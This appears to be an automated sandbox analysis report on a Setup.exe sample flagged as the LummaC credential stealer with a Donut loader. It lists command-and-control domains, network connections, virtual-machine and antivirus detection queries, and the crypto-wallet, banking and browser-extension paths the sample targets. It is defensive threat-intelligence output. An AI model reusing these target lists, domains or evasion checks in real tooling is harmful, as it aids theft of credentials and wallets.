              Source: Setup.exe, 00000000.00000003.2162858016.000000000364A000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2163006437.0000000003649000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2162927299.0000000003647000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: Setup.exe, 00000000.00000003.2162858016.000000000364A000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2162927299.0000000003647000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: Setup.exe, 00000000.00000003.2186564595.000000000393C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
              Source: Setup.exe, 00000000.00000003.2186564595.000000000393C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
              Source: Setup.exe, 00000000.00000003.2186564595.000000000393C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
              Source: Setup.exe, 00000000.00000003.2186564595.000000000393C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: Setup.exe, 00000000.00000003.2186564595.000000000393C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
              Source: Setup.exe, 00000000.00000003.2186564595.000000000393C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
              Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
              Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.5:49721 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.5:49722 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.5:49723 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.5:49724 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.5:49725 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.5:49728 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.5:49731 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.5:49742 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.161.251.21:443 -> 192.168.2.5:49748 version: TLS 1.2

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: 00000000.00000002.4467890525.0000000002480000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: C:\Users\user\Desktop\Setup.exeProcess Stats: CPU usage > 49%
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_0075CBD10_3_0075CBD1
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_0075CBD10_3_0075CBD1
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_0075CBD10_3_0075CBD1
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_0074D9990_3_0074D999
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_0074D9990_3_0074D999
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_007930440_3_00793044
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_007930440_3_00793044
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_007930440_3_00793044
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_007930440_3_00793044
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_0072B6590_3_0072B659
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_0072B6590_3_0072B659
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_0074D9990_3_0074D999
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_0074D9990_3_0074D999
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_0075CBD10_3_0075CBD1
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_0075CBD10_3_0075CBD1
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_0075CBD10_3_0075CBD1
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_007930440_3_00793044
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_007930440_3_00793044
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_007930440_3_00793044
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_007930440_3_00793044
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_0075CBD10_3_0075CBD1
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_0075CBD10_3_0075CBD1
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_0075CBD10_3_0075CBD1
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_007930440_3_00793044
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_007930440_3_00793044
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_007930440_3_00793044
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_007930440_3_00793044
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_0072B6590_3_0072B659
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_0072B6590_3_0072B659
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_0074D9990_3_0074D999
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_0074D9990_3_0074D999
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_0074D9990_3_0074D999
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_0074D9990_3_0074D999
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_007930440_3_00793044
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_007930440_3_00793044
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_007930440_3_00793044
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_007930440_3_00793044
              Source: Setup.exeStatic PE information: invalid certificate
              Source: Setup.exeStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
              Source: Setup.exeStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
              Source: Setup.exe, 00000000.00000003.2136633646.0000000002BD8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameshfolder.dll~/ vs Setup.exe
              Source: Setup.exe, 00000000.00000000.2028661309.0000000000520000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameshfolder.dll~/ vs Setup.exe
              Source: Setup.exeBinary or memory string: OriginalFilenameshfolder.dll~/ vs Setup.exe
              Source: Setup.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
              Source: 00000000.00000002.4467890525.0000000002480000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@2/2
              Source: C:\Users\user\Desktop\Setup.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: Setup.exe, 00000000.00000003.2163337968.000000000361A000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2163196828.0000000003635000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: Setup.exeReversingLabs: Detection: 21%
              Source: Setup.exeVirustotal: Detection: 19%
              Source: Setup.exeString found in binary or memory: -Helper process exited with failure code: 0x%x
              Source: Setup.exeString found in binary or memory: -HelperRegisterTypeLibrary: StatusCode invalidU
              Source: Setup.exeString found in binary or memory: /LoadInf=
              Source: Setup.exeString found in binary or memory: /InstallOnThisVersion: Invalid MinVersion string
              Source: C:\Users\user\Desktop\Setup.exeFile read: C:\Users\user\Desktop\Setup.exeJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: acgenral.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: samcli.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: msacm32.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: dwmapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: winmmbase.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: winmmbase.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: msimg32.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: webio.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: Setup.exeStatic file information: File size 75077735 > 1048576
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_0079EAF4 pushfd ; ret 0_3_0079EC81
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_0079EAF4 pushfd ; ret 0_3_0079EC81
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_0079EAF4 pushfd ; ret 0_3_0079EC81
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_0079EAF4 pushfd ; ret 0_3_0079EC81
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_007A4AE6 pushad ; retf 006Ch0_3_007A4B1D
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_007A4AE6 pushad ; retf 006Ch0_3_007A4B1D
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_007A4AE6 pushad ; retf 006Ch0_3_007A4B1D
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_007A4AE6 pushad ; retf 006Ch0_3_007A4B1D
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_0079EA2A push edx; ret 0_3_0079EAF1
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_0079EA2A push edx; ret 0_3_0079EAF1
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_0079EA2A push edx; ret 0_3_0079EAF1
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_0079EA2A push edx; ret 0_3_0079EAF1
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_0075CAEB push eax; retf 0_3_0075CB3D
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_0075CAEB push eax; retf 0_3_0075CB3D
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_0075CAEB push eax; retf 0_3_0075CB3D
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_0075B5B3 push 00000078h; retf 0_3_0075B5B5
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_0073D97F pushad ; retf 006Ch0_3_0073D985
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_0073D97F pushad ; retf 006Ch0_3_0073D985
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_0073D97F pushad ; retf 006Ch0_3_0073D985
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_0073B636 push 0000006Bh; retf 0_3_0073B638
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_0073B636 push 0000006Bh; retf 0_3_0073B638
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_0073B636 push 0000006Bh; retf 0_3_0073B638
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_007397FA push eax; iretd 0_3_007397FB
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_007397FA push eax; iretd 0_3_007397FB
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_0073C2EB pushad ; iretd 0_3_0073C2EE
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_0073C2EB pushad ; iretd 0_3_0073C2EE
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_0073C2EB pushad ; iretd 0_3_0073C2EE
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_007391DA pushfd ; iretd 0_3_007391DB
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_007391DA pushfd ; iretd 0_3_007391DB
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_007394B8 push ds; iretd 0_3_007395CB
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_007394B8 push ds; iretd 0_3_007395CB
              Source: C:\Users\user\Desktop\Setup.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
              Source: C:\Users\user\Desktop\Setup.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
              Query firmware table information (likely to detect VMs)
              Source: C:\Users\user\Desktop\Setup.exeSystem information queried: FirmwareTableInformationJump to behavior
              Source: C:\Users\user\Desktop\Setup.exe TID: 1088Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
              Source: Setup.exe, 00000000.00000003.2174049537.0000000003645000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
              Source: Setup.exe, 00000000.00000003.2174049537.0000000003645000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
              Source: Setup.exe, 00000000.00000003.2174049537.0000000003645000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
              Source: Setup.exe, 00000000.00000003.2174049537.0000000003645000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
              Source: Setup.exe, 00000000.00000003.2174049537.0000000003645000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
              Source: Setup.exe, 00000000.00000003.2174245134.00000000036B4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696428655p
              Source: Setup.exe, 00000000.00000003.2174049537.0000000003645000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
              Source: Setup.exe, 00000000.00000003.2151792860.000000000073D000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2161734464.0000000000742000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2252229474.0000000000742000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2219391647.0000000000742000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2202431157.0000000000742000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: Setup.exe, 00000000.00000003.2174049537.0000000003645000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
              Source: Setup.exe, 00000000.00000003.2174049537.0000000003645000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
              Source: Setup.exe, 00000000.00000003.2174049537.0000000003645000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
              Source: Setup.exe, 00000000.00000003.2174049537.0000000003645000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
              Source: Setup.exe, 00000000.00000003.2174049537.0000000003645000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
              Source: Setup.exe, 00000000.00000003.2174049537.0000000003645000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
              Source: Setup.exe, 00000000.00000003.2174049537.0000000003645000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
              Source: Setup.exe, 00000000.00000003.2174049537.0000000003645000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
              Source: Setup.exe, 00000000.00000003.2174049537.0000000003645000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
              Source: Setup.exe, 00000000.00000003.2174049537.0000000003645000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
              Source: Setup.exe, 00000000.00000003.2174049537.0000000003645000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
              Source: Setup.exe, 00000000.00000003.2174049537.0000000003645000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
              Source: Setup.exe, 00000000.00000003.2174049537.0000000003645000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
              Source: Setup.exe, 00000000.00000003.2174049537.0000000003645000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
              Source: Setup.exe, 00000000.00000003.2174049537.0000000003645000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
              Source: Setup.exe, 00000000.00000003.2174049537.0000000003645000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
              Source: Setup.exe, 00000000.00000003.2174049537.0000000003645000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
              Source: Setup.exe, 00000000.00000003.2174049537.0000000003645000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
              Source: Setup.exe, 00000000.00000003.2174049537.0000000003645000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
              Source: Setup.exe, 00000000.00000003.2174049537.0000000003645000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
              Source: Setup.exe, 00000000.00000003.2174049537.0000000003645000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
              Source: Setup.exe, 00000000.00000003.2174245134.00000000036B4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: YNVMware
              Source: Setup.exe, 00000000.00000003.2174049537.0000000003645000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
              Source: Setup.exe, 00000000.00000003.2174049537.0000000003645000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
              Source: Setup.exe, 00000000.00000002.4466727451.00000000006F4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWPDt%SystemRoot%\system32\mswsock.dll
              Source: Setup.exe, 00000000.00000003.2174049537.0000000003645000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
              Source: Setup.exe, 00000000.00000003.2174049537.0000000003645000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
              Source: C:\Users\user\Desktop\Setup.exeProcess information queried: ProcessInformationJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              LummaC encrypted strings found
              Source: Setup.exe, 00000000.00000002.4467890525.0000000002480000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: cloudewahsj.shop
              Source: Setup.exe, 00000000.00000002.4467890525.0000000002480000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: rabidcowse.shop
              Source: Setup.exe, 00000000.00000002.4467890525.0000000002480000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: noisycuttej.shop
              Source: Setup.exe, 00000000.00000002.4467890525.0000000002480000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: tirepublicerj.shop
              Source: Setup.exe, 00000000.00000002.4467890525.0000000002480000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: framekgirus.shop
              Source: Setup.exe, 00000000.00000002.4467890525.0000000002480000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: wholersorie.shop
              Source: Setup.exe, 00000000.00000002.4467890525.0000000002480000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: abruptyopsn.shop
              Source: Setup.exe, 00000000.00000002.4467890525.0000000002480000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: nearycrepso.shop
              Source: Setup.exe, 00000000.00000002.4467890525.0000000002480000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: displayclubby.sbs
              Source: C:\Users\user\Desktop\Setup.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: Setup.exe, Setup.exe, 00000000.00000003.2219391647.0000000000745000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2219391647.000000000079E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: C:\Users\user\Desktop\Setup.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

              barindex
              Yara detected LummaC Stealer
              Source: Yara matchFile source: Process Memory Space: Setup.exe PID: 6576, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
              Found many strings related to Crypto-Wallets (likely being stolen)
              Source: Setup.exe, 00000000.00000003.2219391647.0000000000766000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum
              Source: Setup.exe, 00000000.00000003.2219391647.0000000000766000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
              Source: Setup.exe, 00000000.00000003.2219391647.0000000000766000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
              Source: Setup.exe, 00000000.00000003.2202431157.0000000000745000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Jaxx Liberty
              Source: Setup.exe, 00000000.00000003.2202431157.0000000000765000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
              Source: Setup.exe, 00000000.00000003.2202807145.000000000071C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ExodusWeb3
              Source: Setup.exe, 00000000.00000003.2219391647.0000000000766000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum
              Source: Setup.exe, 00000000.00000003.2202807145.0000000000734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
              Source: Setup.exe, 00000000.00000003.2202807145.000000000071C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
